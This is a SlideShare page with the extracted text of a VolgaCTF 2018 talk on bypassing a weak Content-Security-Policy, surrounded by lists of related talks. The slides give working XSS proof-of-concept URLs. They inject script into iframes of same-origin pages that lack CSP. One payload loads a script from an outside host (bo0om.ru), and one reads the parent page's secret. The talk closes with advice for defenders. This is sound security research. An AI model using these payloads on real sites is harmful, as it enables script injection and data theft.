SlideShare a Scribd company logo
CSP bypass
challenge
default-src 'self' 'unsafe-inline';
sandbox allow-forms allow-same-origin
allow-scripts allow-modals
hsts.pro/csp.php
https://deepsec.net/docs/Slides/2016/CSP_Is_Dead,_Long_Live_Strict_CSP!_Lukas_Weichselbaum.pdf
Content-Security-Policy: default-src 'self' 'unsafe-inline';
Content-Security-Policy: default-src 'self' 'unsafe-inline';
Content-Security-Policy: default-src 'self' 'unsafe-inline';
CSP BYPASS
Neatly bypassing CSP
CSP BYPASS
?
Content-Security-Policy: default-src 'self' 'unsafe-inline';
frame=document.createElement("iframe")
frame.src="/css/bootstrap.min.css"
document.body.appendChild(frame)
script=document.createElement('script')
script.src='//bo0om.ru/csp.js’
let myframe = window.frames[0].document
myframe.head.appendChild(script)
+
PoC #1
http://hsts.pro/csp.php?xss=f=document.createElement(%22iframe%2
2);f.id=%22pwn%22;f.src=%22/robots.txt%22;f.onload=()=%3E%7Bx=do
cument.createElement(%27script%27);x.src=%27//bo0om.ru/csp.js%27
;pwn.contentWindow.document.body.appendChild(x)%7D;document.b
ody.appendChild(f);
OR
bit.ly/2MEip1P
X-Frame-Options: deny?
Nginx + /../ = 400
Apache + /%%z = 400
Nope?
What is the maximum length of a URL?
Nginx
Apache
frame=document.createElement("iframe")
frame.src="/"+"A".repeat(20000)
document.body.appendChild(frame)
Cookie
• Create a humongous cookie
for(var i=0;i<5;i++){document.cookie=i+"="+"a".repeat(4000)};
• Open an iframe using any address, which will cause the server to return an error
(often without XFO or CSP)
• Remove the humongous cookie:
for(var i=0;i<5;i++){document.cookie=i+"="}
• Write your own js script into the frame that steals the parent’s secret
PoC #2
http://hsts.pro/csp.php?xss=for%28var%20i=0;i%3C5;i%2b%2b%29%7Bdocu
ment.cookie=i%2b%22=%22%2b%22a%22.repeat%284000%29%7D;f=docum
ent.createElement%28%22iframe%22%29;f.id=%22pwn%22;f.src=%22/%22;f.
onload=%28%29=%3E%7Bfor%28var%20i=0;i%3C5;i%2b%2b%29%7Bdocum
ent.cookie=i%2b%22=%22%7D;x=document.createElement%28%27script%2
7%29;x.src=%27data:,alert%28%22Pwned%20%22%2btop.secret.textConten
t%29%27;pwn.contentWindow.document.body.appendChild%28x%29%7D;d
ocument.body.appendChild%28f%29;
OR
bit.ly/2D1QOry
FixMe
• CSP headers should be present on all the pages, event on the error
pages returned by the web-server.
• CSP options should be configured to restrict the rights to just those
necessary to work with the specific resource. Try setting Content-
Security-Policy-Report-Only: default-src ‘none’ and gradually adding
permission rules for specific use cases.
• If you have to use unsafe-inline for correctly loading and processing
the resources, your only protection is to use nonce or hash-source.
Otherwise, you are exposed to XSS exploits and if CSP doesn’t protect,
why do you need it in the first place?!))
Q?

More Related Content

What's hot

9월 웨비나 - AWS에서의 네트워크 보안 (이경수 솔루션즈 아키텍트)
9월 웨비나 - AWS에서의 네트워크 보안 (이경수 솔루션즈 아키텍트)9월 웨비나 - AWS에서의 네트워크 보안 (이경수 솔루션즈 아키텍트)
9월 웨비나 - AWS에서의 네트워크 보안 (이경수 솔루션즈 아키텍트)
Amazon Web Services Korea
 
DMS와 SCT를 활용한 Oracle에서 Open Source DB로의 전환
DMS와 SCT를 활용한 Oracle에서 Open Source DB로의 전환DMS와 SCT를 활용한 Oracle에서 Open Source DB로의 전환
DMS와 SCT를 활용한 Oracle에서 Open Source DB로의 전환
Amazon Web Services Korea
 
다양한 솔루션으로 만들어가는 AWS 네트워크 보안::이경수::AWS Summit Seoul 2018
다양한 솔루션으로 만들어가는 AWS 네트워크 보안::이경수::AWS Summit Seoul 2018다양한 솔루션으로 만들어가는 AWS 네트워크 보안::이경수::AWS Summit Seoul 2018
다양한 솔루션으로 만들어가는 AWS 네트워크 보안::이경수::AWS Summit Seoul 2018Amazon Web Services Korea
 
CSS 語法教學
CSS 語法教學CSS 語法教學
CSS 語法教學
Shengyou Fan
 
Amazon OpenSearch Deep dive - 내부구조, 성능최적화 그리고 스케일링
Amazon OpenSearch Deep dive - 내부구조, 성능최적화 그리고 스케일링Amazon OpenSearch Deep dive - 내부구조, 성능최적화 그리고 스케일링
Amazon OpenSearch Deep dive - 내부구조, 성능최적화 그리고 스케일링
Amazon Web Services Korea
 
Cross Site Request Forgery Vulnerabilities
Cross Site Request Forgery VulnerabilitiesCross Site Request Forgery Vulnerabilities
Cross Site Request Forgery Vulnerabilities
Marco Morana
 
[2017 AWS Startup Day] AWS 비용 최대 90% 절감하기: 스팟 인스턴스 Deep-Dive
[2017 AWS Startup Day] AWS 비용 최대 90% 절감하기: 스팟 인스턴스 Deep-Dive [2017 AWS Startup Day] AWS 비용 최대 90% 절감하기: 스팟 인스턴스 Deep-Dive
[2017 AWS Startup Day] AWS 비용 최대 90% 절감하기: 스팟 인스턴스 Deep-Dive
Amazon Web Services Korea
 
Vault - Secret and Key Management
Vault - Secret and Key ManagementVault - Secret and Key Management
Vault - Secret and Key Management
Anthony Ikeda
 
AWS Summit Seoul 2023 | 클라우드를 통한 온/오프라인 비즈니스의 통합, GS리테일의 현대화
AWS Summit Seoul 2023 | 클라우드를 통한 온/오프라인 비즈니스의 통합, GS리테일의 현대화AWS Summit Seoul 2023 | 클라우드를 통한 온/오프라인 비즈니스의 통합, GS리테일의 현대화
AWS Summit Seoul 2023 | 클라우드를 통한 온/오프라인 비즈니스의 통합, GS리테일의 현대화
Amazon Web Services Korea
 
롯데이커머스의 마이크로 서비스 아키텍처 진화와 비용 관점의 운영 노하우-나현길, 롯데이커머스 클라우드플랫폼 팀장::AWS 마이그레이션 A ...
롯데이커머스의 마이크로 서비스 아키텍처 진화와 비용 관점의 운영 노하우-나현길, 롯데이커머스 클라우드플랫폼 팀장::AWS 마이그레이션 A ...롯데이커머스의 마이크로 서비스 아키텍처 진화와 비용 관점의 운영 노하우-나현길, 롯데이커머스 클라우드플랫폼 팀장::AWS 마이그레이션 A ...
롯데이커머스의 마이크로 서비스 아키텍처 진화와 비용 관점의 운영 노하우-나현길, 롯데이커머스 클라우드플랫폼 팀장::AWS 마이그레이션 A ...
Amazon Web Services Korea
 
Manual JavaScript Analysis Is A Bug
Manual JavaScript Analysis Is A BugManual JavaScript Analysis Is A Bug
Manual JavaScript Analysis Is A Bug
Lewis Ardern
 
Breaking Bad CSP
Breaking Bad CSPBreaking Bad CSP
Breaking Bad CSP
Lukas Weichselbaum
 
Security DevOps - Staying secure in agile projects // OWASP AppSecEU 2015 - A...
Security DevOps - Staying secure in agile projects // OWASP AppSecEU 2015 - A...Security DevOps - Staying secure in agile projects // OWASP AppSecEU 2015 - A...
Security DevOps - Staying secure in agile projects // OWASP AppSecEU 2015 - A...
Christian Schneider
 
Hadoop installation and Running KMeans Clustering with MapReduce Program on H...
Hadoop installation and Running KMeans Clustering with MapReduce Program on H...Hadoop installation and Running KMeans Clustering with MapReduce Program on H...
Hadoop installation and Running KMeans Clustering with MapReduce Program on H...
Titus Damaiyanti
 
Node.js API 서버 성능 개선기
Node.js API 서버 성능 개선기Node.js API 서버 성능 개선기
Node.js API 서버 성능 개선기
JeongHun Byeon
 
Creating Awesome Web APIs is a Breeze
Creating Awesome Web APIs is a BreezeCreating Awesome Web APIs is a Breeze
Creating Awesome Web APIs is a Breeze
Markus Lanthaler
 
대용량 데이터레이크 마이그레이션 사례 공유 [카카오게임즈 - 레벨 200] - 조은희, 팀장, 카카오게임즈 ::: Games on AWS ...
대용량 데이터레이크 마이그레이션 사례 공유 [카카오게임즈 - 레벨 200] - 조은희, 팀장, 카카오게임즈 ::: Games on AWS ...대용량 데이터레이크 마이그레이션 사례 공유 [카카오게임즈 - 레벨 200] - 조은희, 팀장, 카카오게임즈 ::: Games on AWS ...
대용량 데이터레이크 마이그레이션 사례 공유 [카카오게임즈 - 레벨 200] - 조은희, 팀장, 카카오게임즈 ::: Games on AWS ...
Amazon Web Services Korea
 
Content security policy
Content security policyContent security policy
Content security policy
Ronan Dunne, CEH, SSCP
 
AWS Summit Seoul 2023 | Observability를 넘어선 클라우드 운영관리의 미래
AWS Summit Seoul 2023 | Observability를 넘어선 클라우드 운영관리의 미래AWS Summit Seoul 2023 | Observability를 넘어선 클라우드 운영관리의 미래
AWS Summit Seoul 2023 | Observability를 넘어선 클라우드 운영관리의 미래
Amazon Web Services Korea
 
Masterclass Webinar: Amazon Elastic MapReduce (EMR)
Masterclass Webinar: Amazon Elastic MapReduce (EMR)Masterclass Webinar: Amazon Elastic MapReduce (EMR)
Masterclass Webinar: Amazon Elastic MapReduce (EMR)
Amazon Web Services
 

What's hot (20)

9월 웨비나 - AWS에서의 네트워크 보안 (이경수 솔루션즈 아키텍트)
9월 웨비나 - AWS에서의 네트워크 보안 (이경수 솔루션즈 아키텍트)9월 웨비나 - AWS에서의 네트워크 보안 (이경수 솔루션즈 아키텍트)
9월 웨비나 - AWS에서의 네트워크 보안 (이경수 솔루션즈 아키텍트)
 
DMS와 SCT를 활용한 Oracle에서 Open Source DB로의 전환
DMS와 SCT를 활용한 Oracle에서 Open Source DB로의 전환DMS와 SCT를 활용한 Oracle에서 Open Source DB로의 전환
DMS와 SCT를 활용한 Oracle에서 Open Source DB로의 전환
 
다양한 솔루션으로 만들어가는 AWS 네트워크 보안::이경수::AWS Summit Seoul 2018
다양한 솔루션으로 만들어가는 AWS 네트워크 보안::이경수::AWS Summit Seoul 2018다양한 솔루션으로 만들어가는 AWS 네트워크 보안::이경수::AWS Summit Seoul 2018
다양한 솔루션으로 만들어가는 AWS 네트워크 보안::이경수::AWS Summit Seoul 2018
 
CSS 語法教學
CSS 語法教學CSS 語法教學
CSS 語法教學
 
Amazon OpenSearch Deep dive - 내부구조, 성능최적화 그리고 스케일링
Amazon OpenSearch Deep dive - 내부구조, 성능최적화 그리고 스케일링Amazon OpenSearch Deep dive - 내부구조, 성능최적화 그리고 스케일링
Amazon OpenSearch Deep dive - 내부구조, 성능최적화 그리고 스케일링
 
Cross Site Request Forgery Vulnerabilities
Cross Site Request Forgery VulnerabilitiesCross Site Request Forgery Vulnerabilities
Cross Site Request Forgery Vulnerabilities
 
[2017 AWS Startup Day] AWS 비용 최대 90% 절감하기: 스팟 인스턴스 Deep-Dive
[2017 AWS Startup Day] AWS 비용 최대 90% 절감하기: 스팟 인스턴스 Deep-Dive [2017 AWS Startup Day] AWS 비용 최대 90% 절감하기: 스팟 인스턴스 Deep-Dive
[2017 AWS Startup Day] AWS 비용 최대 90% 절감하기: 스팟 인스턴스 Deep-Dive
 
Vault - Secret and Key Management
Vault - Secret and Key ManagementVault - Secret and Key Management
Vault - Secret and Key Management
 
AWS Summit Seoul 2023 | 클라우드를 통한 온/오프라인 비즈니스의 통합, GS리테일의 현대화
AWS Summit Seoul 2023 | 클라우드를 통한 온/오프라인 비즈니스의 통합, GS리테일의 현대화AWS Summit Seoul 2023 | 클라우드를 통한 온/오프라인 비즈니스의 통합, GS리테일의 현대화
AWS Summit Seoul 2023 | 클라우드를 통한 온/오프라인 비즈니스의 통합, GS리테일의 현대화
 
롯데이커머스의 마이크로 서비스 아키텍처 진화와 비용 관점의 운영 노하우-나현길, 롯데이커머스 클라우드플랫폼 팀장::AWS 마이그레이션 A ...
롯데이커머스의 마이크로 서비스 아키텍처 진화와 비용 관점의 운영 노하우-나현길, 롯데이커머스 클라우드플랫폼 팀장::AWS 마이그레이션 A ...롯데이커머스의 마이크로 서비스 아키텍처 진화와 비용 관점의 운영 노하우-나현길, 롯데이커머스 클라우드플랫폼 팀장::AWS 마이그레이션 A ...
롯데이커머스의 마이크로 서비스 아키텍처 진화와 비용 관점의 운영 노하우-나현길, 롯데이커머스 클라우드플랫폼 팀장::AWS 마이그레이션 A ...
 
Manual JavaScript Analysis Is A Bug
Manual JavaScript Analysis Is A BugManual JavaScript Analysis Is A Bug
Manual JavaScript Analysis Is A Bug
 
Breaking Bad CSP
Breaking Bad CSPBreaking Bad CSP
Breaking Bad CSP
 
Security DevOps - Staying secure in agile projects // OWASP AppSecEU 2015 - A...
Security DevOps - Staying secure in agile projects // OWASP AppSecEU 2015 - A...Security DevOps - Staying secure in agile projects // OWASP AppSecEU 2015 - A...
Security DevOps - Staying secure in agile projects // OWASP AppSecEU 2015 - A...
 
Hadoop installation and Running KMeans Clustering with MapReduce Program on H...
Hadoop installation and Running KMeans Clustering with MapReduce Program on H...Hadoop installation and Running KMeans Clustering with MapReduce Program on H...
Hadoop installation and Running KMeans Clustering with MapReduce Program on H...
 
Node.js API 서버 성능 개선기
Node.js API 서버 성능 개선기Node.js API 서버 성능 개선기
Node.js API 서버 성능 개선기
 
Creating Awesome Web APIs is a Breeze
Creating Awesome Web APIs is a BreezeCreating Awesome Web APIs is a Breeze
Creating Awesome Web APIs is a Breeze
 
대용량 데이터레이크 마이그레이션 사례 공유 [카카오게임즈 - 레벨 200] - 조은희, 팀장, 카카오게임즈 ::: Games on AWS ...
대용량 데이터레이크 마이그레이션 사례 공유 [카카오게임즈 - 레벨 200] - 조은희, 팀장, 카카오게임즈 ::: Games on AWS ...대용량 데이터레이크 마이그레이션 사례 공유 [카카오게임즈 - 레벨 200] - 조은희, 팀장, 카카오게임즈 ::: Games on AWS ...
대용량 데이터레이크 마이그레이션 사례 공유 [카카오게임즈 - 레벨 200] - 조은희, 팀장, 카카오게임즈 ::: Games on AWS ...
 
Content security policy
Content security policyContent security policy
Content security policy
 
AWS Summit Seoul 2023 | Observability를 넘어선 클라우드 운영관리의 미래
AWS Summit Seoul 2023 | Observability를 넘어선 클라우드 운영관리의 미래AWS Summit Seoul 2023 | Observability를 넘어선 클라우드 운영관리의 미래
AWS Summit Seoul 2023 | Observability를 넘어선 클라우드 운영관리의 미래
 
Masterclass Webinar: Amazon Elastic MapReduce (EMR)
Masterclass Webinar: Amazon Elastic MapReduce (EMR)Masterclass Webinar: Amazon Elastic MapReduce (EMR)
Masterclass Webinar: Amazon Elastic MapReduce (EMR)
 

Similar to VolgaCTF 2018 - Neatly bypassing CSP

Content Security Policy - The application security Swiss Army Knife
Content Security Policy - The application security Swiss Army KnifeContent Security Policy - The application security Swiss Army Knife
Content Security Policy - The application security Swiss Army Knife
Scott Helme
 
CONFidence 2018: Defense-in-depth techniques for modern web applications and ...
CONFidence 2018: Defense-in-depth techniques for modern web applications and ...CONFidence 2018: Defense-in-depth techniques for modern web applications and ...
CONFidence 2018: Defense-in-depth techniques for modern web applications and ...
PROIDEA
 
Web Security - CSP & Web Cryptography
Web Security - CSP & Web CryptographyWeb Security - CSP & Web Cryptography
Web Security - CSP & Web Cryptography
Samsung Open Source Group
 
Content-Security-Policy 2018.0
Content-Security-Policy 2018.0Content-Security-Policy 2018.0
Content-Security-Policy 2018.0
Philippe Gamache
 
D3LDN17 - Recruiting the Browser
D3LDN17 - Recruiting the BrowserD3LDN17 - Recruiting the Browser
D3LDN17 - Recruiting the Browser
Imperva Incapsula
 
HTTP_Header_Security.pdf
HTTP_Header_Security.pdfHTTP_Header_Security.pdf
HTTP_Header_Security.pdf
ksudhakarreddy5
 
Cabeçalhos de Segurança HTTP
Cabeçalhos de Segurança HTTPCabeçalhos de Segurança HTTP
Cabeçalhos de Segurança HTTP
Ismael Goncalves
 
Rails security: above and beyond the defaults
Rails security: above and beyond the defaultsRails security: above and beyond the defaults
Rails security: above and beyond the defaults
Matias Korhonen
 
Web content security policies
Web content security policiesWeb content security policies
Web content security policies
Dhanu Gupta
 
Content Security Policies: A whole new way of securing your website that no o...
Content Security Policies: A whole new way of securing your website that no o...Content Security Policies: A whole new way of securing your website that no o...
Content Security Policies: A whole new way of securing your website that no o...
Miriam Schwab
 
Content Security Policies: A whole new way of securing your website that no o...
Content Security Policies: A whole new way of securing your website that no o...Content Security Policies: A whole new way of securing your website that no o...
Content Security Policies: A whole new way of securing your website that no o...
Miriam Schwab
 
Rails and Content Security Policies
Rails and Content Security PoliciesRails and Content Security Policies
Rails and Content Security Policies
Matias Korhonen
 
Csp vortrag
Csp vortragCsp vortrag
Csp vortrag
András Ottó
 
Content Security Policy ByPass
Content Security Policy ByPassContent Security Policy ByPass
Content Security Policy ByPass
PawanJaiswal39
 
HTML5 APIs - Where No Man Has Gone Before - StarTechConf, Chile
HTML5 APIs - Where No Man Has Gone Before - StarTechConf, ChileHTML5 APIs - Where No Man Has Gone Before - StarTechConf, Chile
HTML5 APIs - Where No Man Has Gone Before - StarTechConf, Chile
Robert Nyman
 
Robert Nyman - HTML5 apis where no man has gone before startechconf
Robert Nyman - HTML5 apis where no man has gone before startechconfRobert Nyman - HTML5 apis where no man has gone before startechconf
Robert Nyman - HTML5 apis where no man has gone before startechconf
StarTech Conference
 
Mitigate Maliciousness -- jQuery Europe 2013
Mitigate Maliciousness -- jQuery Europe 2013Mitigate Maliciousness -- jQuery Europe 2013
Mitigate Maliciousness -- jQuery Europe 2013
Mike West
 
Content Security Policy
Content Security PolicyContent Security Policy
Content Security Policy
Ryan LaBouve
 
Csp and http headers
Csp and http headersCsp and http headers
Csp and http headers
devObjective
 
Csp and http headers
Csp and http headersCsp and http headers
Csp and http headers
ColdFusionConference
 

Similar to VolgaCTF 2018 - Neatly bypassing CSP (20)

Content Security Policy - The application security Swiss Army Knife
Content Security Policy - The application security Swiss Army KnifeContent Security Policy - The application security Swiss Army Knife
Content Security Policy - The application security Swiss Army Knife
 
CONFidence 2018: Defense-in-depth techniques for modern web applications and ...
CONFidence 2018: Defense-in-depth techniques for modern web applications and ...CONFidence 2018: Defense-in-depth techniques for modern web applications and ...
CONFidence 2018: Defense-in-depth techniques for modern web applications and ...
 
Web Security - CSP & Web Cryptography
Web Security - CSP & Web CryptographyWeb Security - CSP & Web Cryptography
Web Security - CSP & Web Cryptography
 
Content-Security-Policy 2018.0
Content-Security-Policy 2018.0Content-Security-Policy 2018.0
Content-Security-Policy 2018.0
 
D3LDN17 - Recruiting the Browser
D3LDN17 - Recruiting the BrowserD3LDN17 - Recruiting the Browser
D3LDN17 - Recruiting the Browser
 
HTTP_Header_Security.pdf
HTTP_Header_Security.pdfHTTP_Header_Security.pdf
HTTP_Header_Security.pdf
 
Cabeçalhos de Segurança HTTP
Cabeçalhos de Segurança HTTPCabeçalhos de Segurança HTTP
Cabeçalhos de Segurança HTTP
 
Rails security: above and beyond the defaults
Rails security: above and beyond the defaultsRails security: above and beyond the defaults
Rails security: above and beyond the defaults
 
Web content security policies
Web content security policiesWeb content security policies
Web content security policies
 
Content Security Policies: A whole new way of securing your website that no o...
Content Security Policies: A whole new way of securing your website that no o...Content Security Policies: A whole new way of securing your website that no o...
Content Security Policies: A whole new way of securing your website that no o...
 
Content Security Policies: A whole new way of securing your website that no o...
Content Security Policies: A whole new way of securing your website that no o...Content Security Policies: A whole new way of securing your website that no o...
Content Security Policies: A whole new way of securing your website that no o...
 
Rails and Content Security Policies
Rails and Content Security PoliciesRails and Content Security Policies
Rails and Content Security Policies
 
Csp vortrag
Csp vortragCsp vortrag
Csp vortrag
 
Content Security Policy ByPass
Content Security Policy ByPassContent Security Policy ByPass
Content Security Policy ByPass
 
HTML5 APIs - Where No Man Has Gone Before - StarTechConf, Chile
HTML5 APIs - Where No Man Has Gone Before - StarTechConf, ChileHTML5 APIs - Where No Man Has Gone Before - StarTechConf, Chile
HTML5 APIs - Where No Man Has Gone Before - StarTechConf, Chile
 
Robert Nyman - HTML5 apis where no man has gone before startechconf
Robert Nyman - HTML5 apis where no man has gone before startechconfRobert Nyman - HTML5 apis where no man has gone before startechconf
Robert Nyman - HTML5 apis where no man has gone before startechconf
 
Mitigate Maliciousness -- jQuery Europe 2013
Mitigate Maliciousness -- jQuery Europe 2013Mitigate Maliciousness -- jQuery Europe 2013
Mitigate Maliciousness -- jQuery Europe 2013
 
Content Security Policy
Content Security PolicyContent Security Policy
Content Security Policy
 
Csp and http headers
Csp and http headersCsp and http headers
Csp and http headers
 
Csp and http headers
Csp and http headersCsp and http headers
Csp and http headers
 

More from Дмитрий Бумов

2000day in Safari
2000day in Safari2000day in Safari
2000day in Safari
Дмитрий Бумов
 
Partyhack 3.0 - Telegram bugbounty writeup
Partyhack 3.0 - Telegram bugbounty writeupPartyhack 3.0 - Telegram bugbounty writeup
Partyhack 3.0 - Telegram bugbounty writeup
Дмитрий Бумов
 
ZeroNights 2018 | I <"3 XSS
ZeroNights 2018 | I <"3 XSSZeroNights 2018 | I <"3 XSS
ZeroNights 2018 | I <"3 XSS
Дмитрий Бумов
 
ZeroNights 2018 | Race Condition Tool
ZeroNights 2018 | Race Condition ToolZeroNights 2018 | Race Condition Tool
ZeroNights 2018 | Race Condition Tool
Дмитрий Бумов
 
Offzone | Another waf bypass
Offzone | Another waf bypassOffzone | Another waf bypass
Offzone | Another waf bypass
Дмитрий Бумов
 
Defcon Russia 2017 - Bo0oM vs Шурыгина
Defcon Russia 2017 - Bo0oM vs ШурыгинаDefcon Russia 2017 - Bo0oM vs Шурыгина
Defcon Russia 2017 - Bo0oM vs Шурыгина
Дмитрий Бумов
 
DC7499 - Param-pam-pam
DC7499 - Param-pam-pamDC7499 - Param-pam-pam
DC7499 - Param-pam-pam
Дмитрий Бумов
 
KazHackStan - "><script>alert()</script>
KazHackStan - "><script>alert()</script>KazHackStan - "><script>alert()</script>
KazHackStan - "><script>alert()</script>
Дмитрий Бумов
 
Отравление кэша веб-приложений
Отравление кэша веб-приложенийОтравление кэша веб-приложений
Отравление кэша веб-приложений
Дмитрий Бумов
 
XSS. Обходы фильтров и защит.
XSS. Обходы фильтров и защит.XSS. Обходы фильтров и защит.
XSS. Обходы фильтров и защит.
Дмитрий Бумов
 
RIW 2017 | Все плохо
RIW 2017 | Все плохоRIW 2017 | Все плохо
RIW 2017 | Все плохо
Дмитрий Бумов
 
Skolkovo школа | Капельку о MITM
Skolkovo школа | Капельку о MITMSkolkovo школа | Капельку о MITM
Skolkovo школа | Капельку о MITM
Дмитрий Бумов
 
PHDAYS 2017 | Зато удобно! Утечки из-за ботов в telegram
PHDAYS 2017 | Зато удобно! Утечки из-за ботов в telegramPHDAYS 2017 | Зато удобно! Утечки из-за ботов в telegram
PHDAYS 2017 | Зато удобно! Утечки из-за ботов в telegram
Дмитрий Бумов
 
Armsec 2017 | 2 bugs 1 safari
Armsec 2017 | 2 bugs 1 safariArmsec 2017 | 2 bugs 1 safari
Armsec 2017 | 2 bugs 1 safari
Дмитрий Бумов
 
KazHackStan 2017 | Tracking
KazHackStan 2017 | TrackingKazHackStan 2017 | Tracking
KazHackStan 2017 | Tracking
Дмитрий Бумов
 
Zeronights 2016 | A blow under the belt. How to avoid WAF/IPS/DLP | Удар ниже...
Zeronights 2016 | A blow under the belt. How to avoid WAF/IPS/DLP | Удар ниже...Zeronights 2016 | A blow under the belt. How to avoid WAF/IPS/DLP | Удар ниже...
Zeronights 2016 | A blow under the belt. How to avoid WAF/IPS/DLP | Удар ниже...
Дмитрий Бумов
 
Разведка боем
Разведка боемРазведка боем
Разведка боем
Дмитрий Бумов
 
VolgaCTF | Bo0oM - DNS and attacks
VolgaCTF | Bo0oM - DNS and attacksVolgaCTF | Bo0oM - DNS and attacks
VolgaCTF | Bo0oM - DNS and attacks
Дмитрий Бумов
 
пресс конференция 15.06.2016. безопасность платежных систем и банков
пресс конференция 15.06.2016. безопасность платежных систем и банковпресс конференция 15.06.2016. безопасность платежных систем и банков
пресс конференция 15.06.2016. безопасность платежных систем и банков
Дмитрий Бумов
 
Fuzz.txt
Fuzz.txtFuzz.txt

More from Дмитрий Бумов (20)

2000day in Safari
2000day in Safari2000day in Safari
2000day in Safari
 
Partyhack 3.0 - Telegram bugbounty writeup
Partyhack 3.0 - Telegram bugbounty writeupPartyhack 3.0 - Telegram bugbounty writeup
Partyhack 3.0 - Telegram bugbounty writeup
 
ZeroNights 2018 | I <"3 XSS
ZeroNights 2018 | I <"3 XSSZeroNights 2018 | I <"3 XSS
ZeroNights 2018 | I <"3 XSS
 
ZeroNights 2018 | Race Condition Tool
ZeroNights 2018 | Race Condition ToolZeroNights 2018 | Race Condition Tool
ZeroNights 2018 | Race Condition Tool
 
Offzone | Another waf bypass
Offzone | Another waf bypassOffzone | Another waf bypass
Offzone | Another waf bypass
 
Defcon Russia 2017 - Bo0oM vs Шурыгина
Defcon Russia 2017 - Bo0oM vs ШурыгинаDefcon Russia 2017 - Bo0oM vs Шурыгина
Defcon Russia 2017 - Bo0oM vs Шурыгина
 
DC7499 - Param-pam-pam
DC7499 - Param-pam-pamDC7499 - Param-pam-pam
DC7499 - Param-pam-pam
 
KazHackStan - "><script>alert()</script>
KazHackStan - "><script>alert()</script>KazHackStan - "><script>alert()</script>
KazHackStan - "><script>alert()</script>
 
Отравление кэша веб-приложений
Отравление кэша веб-приложенийОтравление кэша веб-приложений
Отравление кэша веб-приложений
 
XSS. Обходы фильтров и защит.
XSS. Обходы фильтров и защит.XSS. Обходы фильтров и защит.
XSS. Обходы фильтров и защит.
 
RIW 2017 | Все плохо
RIW 2017 | Все плохоRIW 2017 | Все плохо
RIW 2017 | Все плохо
 
Skolkovo школа | Капельку о MITM
Skolkovo школа | Капельку о MITMSkolkovo школа | Капельку о MITM
Skolkovo школа | Капельку о MITM
 
PHDAYS 2017 | Зато удобно! Утечки из-за ботов в telegram
PHDAYS 2017 | Зато удобно! Утечки из-за ботов в telegramPHDAYS 2017 | Зато удобно! Утечки из-за ботов в telegram
PHDAYS 2017 | Зато удобно! Утечки из-за ботов в telegram
 
Armsec 2017 | 2 bugs 1 safari
Armsec 2017 | 2 bugs 1 safariArmsec 2017 | 2 bugs 1 safari
Armsec 2017 | 2 bugs 1 safari
 
KazHackStan 2017 | Tracking
KazHackStan 2017 | TrackingKazHackStan 2017 | Tracking
KazHackStan 2017 | Tracking
 
Zeronights 2016 | A blow under the belt. How to avoid WAF/IPS/DLP | Удар ниже...
Zeronights 2016 | A blow under the belt. How to avoid WAF/IPS/DLP | Удар ниже...Zeronights 2016 | A blow under the belt. How to avoid WAF/IPS/DLP | Удар ниже...
Zeronights 2016 | A blow under the belt. How to avoid WAF/IPS/DLP | Удар ниже...
 
Разведка боем
Разведка боемРазведка боем
Разведка боем
 
VolgaCTF | Bo0oM - DNS and attacks
VolgaCTF | Bo0oM - DNS and attacksVolgaCTF | Bo0oM - DNS and attacks
VolgaCTF | Bo0oM - DNS and attacks
 
пресс конференция 15.06.2016. безопасность платежных систем и банков
пресс конференция 15.06.2016. безопасность платежных систем и банковпресс конференция 15.06.2016. безопасность платежных систем и банков
пресс конференция 15.06.2016. безопасность платежных систем и банков
 
Fuzz.txt
Fuzz.txtFuzz.txt
Fuzz.txt
 

Recently uploaded

Mutation Testing for Task-Oriented Chatbots
Mutation Testing for Task-Oriented ChatbotsMutation Testing for Task-Oriented Chatbots
Mutation Testing for Task-Oriented Chatbots
Pablo Gómez Abajo
 
"Frontline Battles with DDoS: Best practices and Lessons Learned", Igor Ivaniuk
"Frontline Battles with DDoS: Best practices and Lessons Learned",  Igor Ivaniuk"Frontline Battles with DDoS: Best practices and Lessons Learned",  Igor Ivaniuk
"Frontline Battles with DDoS: Best practices and Lessons Learned", Igor Ivaniuk
Fwdays
 
JavaLand 2024: Application Development Green Masterplan
JavaLand 2024: Application Development Green MasterplanJavaLand 2024: Application Development Green Masterplan
JavaLand 2024: Application Development Green Masterplan
Miro Wengner
 
Essentials of Automations: Exploring Attributes & Automation Parameters
Essentials of Automations: Exploring Attributes & Automation ParametersEssentials of Automations: Exploring Attributes & Automation Parameters
Essentials of Automations: Exploring Attributes & Automation Parameters
Safe Software
 
GNSS spoofing via SDR (Criptored Talks 2024)
GNSS spoofing via SDR (Criptored Talks 2024)GNSS spoofing via SDR (Criptored Talks 2024)
GNSS spoofing via SDR (Criptored Talks 2024)
Javier Junquera
 
AWS Certified Solutions Architect Associate (SAA-C03)
AWS Certified Solutions Architect Associate (SAA-C03)AWS Certified Solutions Architect Associate (SAA-C03)
AWS Certified Solutions Architect Associate (SAA-C03)
HarpalGohil4
 
LF Energy Webinar: Carbon Data Specifications: Mechanisms to Improve Data Acc...
LF Energy Webinar: Carbon Data Specifications: Mechanisms to Improve Data Acc...LF Energy Webinar: Carbon Data Specifications: Mechanisms to Improve Data Acc...
LF Energy Webinar: Carbon Data Specifications: Mechanisms to Improve Data Acc...
DanBrown980551
 
"NATO Hackathon Winner: AI-Powered Drug Search", Taras Kloba
"NATO Hackathon Winner: AI-Powered Drug Search",  Taras Kloba"NATO Hackathon Winner: AI-Powered Drug Search",  Taras Kloba
"NATO Hackathon Winner: AI-Powered Drug Search", Taras Kloba
Fwdays
 
Apps Break Data
Apps Break DataApps Break Data
Apps Break Data
Ivo Velitchkov
 
Christine's Supplier Sourcing Presentaion.pptx
Christine's Supplier Sourcing Presentaion.pptxChristine's Supplier Sourcing Presentaion.pptx
Christine's Supplier Sourcing Presentaion.pptx
christinelarrosa
 
GlobalLogic Java Community Webinar #18 “How to Improve Web Application Perfor...
GlobalLogic Java Community Webinar #18 “How to Improve Web Application Perfor...GlobalLogic Java Community Webinar #18 “How to Improve Web Application Perfor...
GlobalLogic Java Community Webinar #18 “How to Improve Web Application Perfor...
GlobalLogic Ukraine
 
GraphRAG for LifeSciences Hands-On with the Clinical Knowledge Graph
GraphRAG for LifeSciences Hands-On with the Clinical Knowledge GraphGraphRAG for LifeSciences Hands-On with the Clinical Knowledge Graph
GraphRAG for LifeSciences Hands-On with the Clinical Knowledge Graph
Neo4j
 
inQuba Webinar Mastering Customer Journey Management with Dr Graham Hill
inQuba Webinar Mastering Customer Journey Management with Dr Graham HillinQuba Webinar Mastering Customer Journey Management with Dr Graham Hill
inQuba Webinar Mastering Customer Journey Management with Dr Graham Hill
LizaNolte
 
[OReilly Superstream] Occupy the Space: A grassroots guide to engineering (an...
